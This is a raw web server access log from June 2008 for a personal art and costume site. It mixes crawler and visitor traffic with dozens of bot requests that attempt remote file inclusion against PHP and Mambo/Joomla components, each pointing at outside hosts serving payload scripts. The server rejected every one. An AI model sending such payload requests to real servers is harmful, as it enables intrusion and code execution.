209.200.255.44 - - [11/Jun/2008:03:27:39 -0500] "GET //errors.php?error=http://badllama.net/files/robot.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
66.98.140.99 - - [11/Jun/2008:03:32:58 -0500] "GET /logs//errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
66.98.140.99 - - [11/Jun/2008:03:32:58 -0500] "GET //errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
72.46.131.186 - - [11/Jun/2008:03:34:38 -0500] "GET /logs/access_log.1208649600//modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
72.46.131.186 - - [11/Jun/2008:03:34:38 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.46.131.186 - - [11/Jun/2008:03:34:38 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
72.46.131.186 - - [11/Jun/2008:03:34:56 -0500] "GET /logs/access_log.1204156800//modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
200.76.111.11 - - [11/Jun/2008:03:41:19 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
200.76.111.11 - - [11/Jun/2008:03:41:19 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
77.79.246.200 - - [11/Jun/2008:03:42:46 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tugaspeed.info/system.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.808"
77.79.246.200 - - [11/Jun/2008:03:42:48 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tugaspeed.info/system.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
213.194.149.215 - - [11/Jun/2008:03:43:59 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
213.194.149.215 - - [11/Jun/2008:03:43:59 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
83.18.104.114 - - [11/Jun/2008:03:44:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tugaspeed.info/system.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
83.18.104.114 - - [11/Jun/2008:03:44:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tugaspeed.info/system.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
131.107.65.41 - - [11/Jun/2008:03:55:43 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""MSR-ISRCCrawler"
202.28.68.88 - - [11/Jun/2008:04:06:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
202.28.68.88 - - [11/Jun/2008:04:06:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
65.55.208.131 - - [11/Jun/2008:04:06:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.28.89 - - [11/Jun/2008:04:18:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [11/Jun/2008:04:18:18 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.89 - - [11/Jun/2008:04:19:26 -0500] "GET /logs/access_log.1197676800 HTTP/1.0" 200 88911 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.202.21.72 - - [11/Jun/2008:04:29:06 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:29:14 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:29:43 -0500] "GET /?S=A HTTP/1.0" 200 1231 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:30:05 -0500] "GET /memorial/ HTTP/1.0" 200 817 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:30:17 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:30:23 -0500] "GET /artwork/ HTTP/1.0" 200 11078 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:31:34 -0500] "GET /?M=A HTTP/1.0" 200 1231 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:31:39 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:31:50 -0500] "GET /?N=D HTTP/1.0" 200 1231 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:32:08 -0500] "GET /rachel%20study/ HTTP/1.0" 200 6339 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:32:38 -0500] "GET /logs/ HTTP/1.0" 200 86899 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.21.72 - - [11/Jun/2008:04:32:51 -0500] "GET /?D=A HTTP/1.0" 200 1231 "http://tomdolan.pconline.com/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
74.6.18.234 - - [11/Jun/2008:04:46:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.238 - - [11/Jun/2008:04:46:18 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.114.58 - - [11/Jun/2008:04:51:07 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
65.55.208.119 - - [11/Jun/2008:04:55:10 -0500] "GET /logs/access_log.1156896000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.3.229.166 - - [11/Jun/2008:04:57:56 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nozyk.org/rob.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.3.229.166 - - [11/Jun/2008:04:57:58 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nozyk.org/rob.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
65.55.208.119 - - [11/Jun/2008:04:59:36 -0500] "GET /logs/access_log.1195344000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [11/Jun/2008:04:59:37 -0500] "GET /logs/access_log.1190419200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [11/Jun/2008:04:59:37 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
122.164.5.0 - - [11/Jun/2008:05:01:23 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:01:53 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:15 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:19 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:19 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:19 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:20 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:21 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:23 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:23 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:24 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:03:33 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
132.248.5.4 - - [11/Jun/2008:05:03:37 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:03:42 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:03:58 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:05 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:07 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:07 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:08 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:12 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:12 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:13 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:52 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:04:57 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:05:14 -0500] "GET /logs//errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.5.4 - - [11/Jun/2008:05:05:19 -0500] "GET //errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:05:07:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:05:07:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:05:07:05 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
190.34.160.226 - - [11/Jun/2008:05:07:08 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
203.82.114.150 - - [11/Jun/2008:05:08:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
77.79.246.200 - - [11/Jun/2008:05:09:39 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://tugaspeed.info/system.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
77.79.246.200 - - [11/Jun/2008:05:09:39 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tugaspeed.info/system.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
84.246.21.79 - - [11/Jun/2008:05:11:05 -0500] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
84.246.21.79 - - [11/Jun/2008:05:11:05 -0500] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.208.121 - - [11/Jun/2008:05:11:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [11/Jun/2008:05:11:31 -0500] "GET /logs/access_log.1157932800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.52.114.58 - - [11/Jun/2008:05:11:55 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:11:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:11:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:11:56 -0500] "GET /logs/access_log.1208649600//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
65.55.208.121 - - [11/Jun/2008:05:12:12 -0500] "GET /logs/access_log.1174953600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [11/Jun/2008:05:12:13 -0500] "GET /logs/access_log.1194566400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [11/Jun/2008:05:12:13 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [11/Jun/2008:05:12:13 -0500] "GET /rachel%20study/rachel%20saint.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.28.68.88 - - [11/Jun/2008:05:24:19 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
202.28.68.88 - - [11/Jun/2008:05:24:20 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
74.52.114.58 - - [11/Jun/2008:05:28:09 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:28:09 -0500] "GET //Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:28:10 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:28:51 -0500] "GET /logs/access_log.1208649600//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
217.75.131.199 - - [11/Jun/2008:05:30:32 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
217.75.131.199 - - [11/Jun/2008:05:30:35 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:35 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:35 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:35 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.75.131.199 - - [11/Jun/2008:05:30:41 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.98.140.99 - - [11/Jun/2008:05:30:46 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.98.140.99 - - [11/Jun/2008:05:30:46 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
200.76.111.11 - - [11/Jun/2008:05:31:35 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
200.76.111.11 - - [11/Jun/2008:05:31:35 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
203.146.102.38 - - [11/Jun/2008:05:31:57 -0500] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
203.146.102.38 - - [11/Jun/2008:05:31:58 -0500] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
82.77.11.177 - - [11/Jun/2008:05:34:29 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
82.77.11.177 - - [11/Jun/2008:05:34:29 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
82.77.11.177 - - [11/Jun/2008:05:34:34 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
82.77.11.177 - - [11/Jun/2008:05:34:34 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
74.52.114.58 - - [11/Jun/2008:05:34:56 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:34:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
74.52.114.58 - - [11/Jun/2008:05:34:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
82.77.11.177 - - [11/Jun/2008:05:35:10 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
82.77.11.177 - - [11/Jun/2008:05:35:11 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/mbahgaul/KaBo.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
74.52.114.58 - - [11/Jun/2008:05:35:40 -0500] "GET /logs/access_log.1208649600//Neos_Chronos/header.php?base_folder=http://home.vatlytuoitre.com//modules/strings.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
122.164.5.0 - - [11/Jun/2008:05:35:55 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:18 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:20 -0500] "GET /costume/costm1.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm3.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm2.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm4.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm5.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm6.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:21 -0500] "GET /costume/costm7.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:22 -0500] "GET /costume/costm8.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:22 -0500] "GET /costume/costm9.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:22 -0500] "GET /costume/costm10.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:22 -0500] "GET /costume/costm11.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.164.5.0 - - [11/Jun/2008:05:36:22 -0500] "GET /costume/costm12.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.79.246.200 - - [11/Jun/2008:05:37:33 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://tugaspeed.info/system.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
